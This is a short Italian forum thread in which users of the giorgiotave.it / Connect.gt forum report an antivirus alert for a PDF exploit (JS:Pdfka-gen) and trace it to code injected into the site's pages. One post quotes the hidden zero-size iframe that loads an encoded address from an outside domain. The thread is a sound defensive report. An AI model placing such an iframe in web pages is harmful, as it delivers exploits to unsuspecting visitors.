- Home
- Categorie
- La Community Connect.gt
- News Ufficiali da Connect.gt
- richiesta installazione plugin mancanti JS:Pdfka-gen [Expl]
-
richiesta installazione plugin mancanti JS:Pdfka-gen [Expl]
imageshack.us/photo/my-images/32/giorgiotave.jpg/
nell'immagine lo screenshot dell'alert.
Viene rilevata una richiesta di installazione plugin esterni con rimando ad un file pdf vuoto free-poli.vv.cc/manuale.pdf
Infezione: JS:Pdfka-gen [Expl]
Particolari: sola pagina web di thread su giorgiotave.it aperta, nessun servizio anomalo in esecuzione sul pc.
-
Confermo la presenza di questo Expl.
Giriamo subito il tutto a chi di competenza.
Grazie.
-
Dopo una un po' più precisa analisi:
la componente incriminata genera il codice di marcatura per richiamo documentazione su iframe passando anche un valore in codifica base64.
<iframe src="free-poli.vv.cc/QQkFBwQHBQEDBwYBEkcJBQcEAgEMDQcGBg==" width="0" height="0" frameborder="0"></iframe>
Ho inoltre riscontrato che lo stesso viene richiamato esclusivamente visualizzando la lista dei thread in una data categoria del forum gt ed anche nell'apertura di un thread.
